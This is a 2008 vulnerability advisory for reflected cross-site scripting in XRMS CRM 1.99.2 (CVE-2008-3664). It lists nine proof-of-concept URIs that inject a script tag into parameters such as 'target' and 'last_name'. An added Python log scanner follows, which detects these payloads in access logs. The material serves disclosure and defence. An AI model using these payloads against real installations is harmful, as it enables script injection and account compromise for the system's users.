| Title | XRMS CRM Multiple Input Validation Vulnerabilities |
| Published | 2008-09-04-12:00AM |
| Updated | 2008-09-04-04:24PM |
| Class | Input Validation Error |
| CVE | CVE-2008-3664 |
| Remote | Yes |
| Local | No |
| Credit | Fabian Fingerle |
| Vulnerable | XRMS CRM XRMS 1.99.2 |
| Not Vulnerable | |
| Code |
Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.

The following example URIs are available to demonstrate the cross-site scripting issues:

http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>
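For defenders reviewing web server logs of an XRMS installation, the following added example (not part of the advisory and not XRMS code) flags requests whose values for the parameters named above contain characters that close a quoted attribute or open a tag. The common/combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names taken from the advisory's example URIs.
ADVISORY_PARAMS = {
    "target", "title", "company_name", "last_name", "campaign_title",
    "opportunity_title", "case_title", "file_id", "starting",
}
# Characters that close a double-quoted attribute or open a tag, as '">' does.
BREAKOUT = re.compile(r'[<>"]')
# Request field of a common/combined access-log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Sep/2008:10:00:01 +0000] "GET /xrms/contacts/some.php?last_name=O%27Brien HTTP/1.1" 200 5120',
    '192.0.2.44 - - [04/Sep/2008:10:00:07 +0000] "GET /xrms/login.php?target=%22%3E%3Cscript%3Ealert(1)%3B%3C/script%3E HTTP/1.1" 200 2048',
    '192.0.2.44 - - [04/Sep/2008:10:00:09 +0000] "GET /xrms/files/some.php?file_id=%2522%253E%253Cb%253E HTTP/1.1" 200 1900',
    '192.0.2.10 - - [04/Sep/2008:10:00:12 +0000] "GET /xrms/reports/custom/mileage.php?starting=2008-09-01 HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo values percent-encoded more than once (such as %253C), up to a small bound."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line number, parameter, decoded value) for each suspicious value."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line in the assumed format
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)  # parse_qsl has already decoded once
            if name.lower() in ADVISORY_PARAMS and BREAKOUT.search(value):
                hits.append((number, name.lower(), value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The single quote is left out of the pattern so that ordinary values such as `O'Brien` in `last_name` are not reported.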
Copyright 2007,
SecurityDot
Sun, 23 Nov 2008 09:22:31 +0000